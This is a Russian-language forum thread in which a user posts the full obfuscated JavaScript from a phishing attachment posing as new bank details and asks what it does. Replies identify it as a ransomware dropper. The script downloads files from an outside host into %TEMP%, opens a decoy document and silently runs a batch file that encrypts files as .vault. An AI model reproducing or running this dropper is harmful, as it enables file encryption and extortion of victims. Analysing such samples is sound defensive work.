|
|
|
Вопрос спецам по JS | ☑ | ||
|---|---|---|---|---|
|
0
s-pc
17.03.15
✎
11:50
|
Пришло письмо на почту, типа от контрагента, типа "Мы поменяли счет", типа "Новые реквизиты в прикрепленном файле". В прикрепленном файле архив rar, а в архиве какой-то js файл. Ну, короче, типичный развод на тему "обязательно запустите у себя этот файл и будет вам сюрприз".
Вот полный код этого js-файла. ============================= /////// ha2ZKqPLvmqT58ML8kHaM4rAkaF3ZZA5nQ6KyLc4kBCyd7wSZPZSw3MtkGvHHGhheHbv9UGD6wBTPvMsVNGCSmsdM5n2JFyhM3gVp8vcmCWW6Z2SG /////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm /////// Mmf6tNBzRnpTFzhA8VCBC7PWX9TtcR3s2K3dsnHtWmrGmwLYzt64yWLPRbSndwZbdM9EehKBy76jqxHSVHdZAy6HmPSqZW4t4psCpBcZBJQChE7v ///// var _$_b78e=["%TEMP%\x5C","%TEMP%\x5Cvault.bat","download-attachment","%TEMP%\x5Cerror.doc","WScript.Shell","ExpandEnvironmentStrings","Run","MSXML2.XMLHTTP","GET","open","send","Scripting.FileSystemObject","ADODB.Stream","Open","Type","ResponseBody","Write","Position","SaveToFile","Close","http://",".com/word.pdf","","error.doc",".com/403.vlt","403.vlt",".com/iconv.vlt","iconv.vlt",".com/index.vlt","index.vlt",".com/input.vlt","vault.bat";]; /////// ha2ZKqPLvmqT58ML8kHaM4rAkaF3ZZA5nQ6KyLc4kBCyd7wSZPZSw3MtkGvHHGhheHbv9UGD6wBTPvMsVNGCSmsdM5n2JFyhM3gVp8vcmCWW6Z2SG /////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm /////// Mmf6tNBzRnpTFzhA8VCBC7PWX9TtcR3s2K3dsnHtWmrGmwLYzt64yWLPRbSndwZbdM9EehKBy76jqxHSVHdZAy6HmPSqZW4t4psCpBcZBJQChE7v ///// var btcapp=_$_b78e[0];var sea=_$_b78e[1];var image=_$_b78e[2];var fingr=_$_b78e[3];var WshShell=CreateObject(_$_b78e[4]);btcapp=WshShell[_$_b78e[5]](btcapp); ////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm function CreateObject(a){return new ActiveXObject(a)}function lanka(sea){WshShell[_$_b78e[6]](sea,0,0)} /////// ha2ZKqPLvmqT58ML8kHaM4rAkaF3ZZA5nQ6KyLc4kBCyd7wSZPZSw3MtkGvHHGhheHbv9UGD6wBTPvMsVNGCSmsdM5n2JFyhM3gVp8vcmCWW6Z2SG /////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm ////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm /////// Mmf6tNBzRnpTFzhA8VCBC7PWX9TtcR3s2K3dsnHtWmrGmwLYzt64yWLPRbSndwZbdM9EehKBy76jqxHSVHdZAy6HmPSqZW4t4psCpBcZBJQChE7v ///// function oro(btcapp){WshShell[_$_b78e[6]](btcapp,1,0)} ///////// BKFXBaHTgpKgGNjNYF8yRJ3nTfNtT5uzHDFBqrHU6szehTrfX6YyQVfBNxMnBtRRbV9tJX63u ///////// function ddq(e,btcapp){var d= new ActiveXObject(_$_b78e[7]);d[_$_b78e[9]](_$_b78e[8],e,0);d[_$_b78e[10]]();var b= new ActiveXObject(_$_b78e[11]);var c= new ActiveXObject(_$_b78e[12]);c[_$_b78e[13]]();c[_$_b78e[14]]=1;c[_$_b78e[16]](d[_$_b78e[15]]);c[_$_b78e[17]]=0;c[_$_b78e[18]](btcapp,2);c[_$_b78e[19]]();}ddq(_$_b78e[20]+image+_$_b78e[21],_$_b78e[22]+btcapp+_$_b78e[23]);try{oro(_$_b78e[22]+fingr+_$_b78e[22])}catch(okay){};ddq(_$_b78e[20]+image+_$_b78e[24],_$_b78e[22]+btcapp+_$_b78e[25]);ddq(_$_b78e[20]+image+_$_b78e[26],_$_b78e[22]+btcapp+_$_b78e[27]); /////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm ////////////////// ddq(_$_b78e[20]+image+_$_b78e[28],_$_b78e[22]+btcapp+_$_b78e[29]);ddq(_$_b78e[20]+image+_$_b78e[30],_$_b78e[22]+btcapp+_$_b78e[31]); ////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm /////// Mmf6tNBzRnpTFzhA8VCBC7PWX9TtcR3s2K3dsnHtWmrGmwLYzt64yWLPRbSndwZbdM9EehKBy76jqxHSVHdZAy6HmPSqZW4t4psCpBcZBJQChE7v ///// lanka(_$_b78e[22]+sea+_$_b78e[22]); ////// v7xEmBPPwXeN8NmESTLbqBWaEuK2qXGA6XzNCe5Z635uxwPZk3ZDPtBWJjkLCL8RW8wWBtZDVJeXFfjHjrUwkHwGV5TUjDuV94AJWXRfsHu46zxKyRYt7V2kLfUEJDUMm /////// Mmf6tNBzRnpTFzhA8VCBC7PWX9TtcR3s2K3dsnHtWmrGmwLYzt64yWLPRbSndwZbdM9EehKBy76jqxHSVHdZAy6HmPSqZW4t4psCpBcZBJQChE7v ///// ============================= Подскажите, пожалуйста, хотя бы в общих чертах - чего этот файл хотел сделать с компьютером. Без подробностей - просто для удовлетворения любопытства. |
|||
|
1
Зеленый Кот
17.03.15
✎
11:56
|
запусти - узнаешь!
|
|||
|
2
Зеленый Кот
17.03.15
✎
11:57
|
xD
зашифрован твой js! предположительно хотел создать файл vault.bat и запустить, почле чего твои фалы зашифровались бы... |
|||
|
3
ice777
17.03.15
✎
11:57
|
(0) в песочнице запусти.
|
|||
|
4
Гёдза
17.03.15
✎
11:58
|
что-то качает и запускает потом
|
|||
|
5
Зеленый Кот
17.03.15
✎
11:59
|
что-то подобное...
Вирус изменил расширение на .vault [Trojan-Ransom.BAT.Scatter.ak ] Добрый день. Получил письмо, как из налоговой, открыл, после все доки ворд, эксель и картинки изменили расширение.vault. Возможно ли эти файлы восстановить? http://virusinfo.info/showthread.php?t=179340&s=0ddcbdd96e2fffe954c8c722c14b2b79 |
| Форум | Правила | Описание | Объявления | Секции | Поиск | Книга знаний | Вики-миста |
|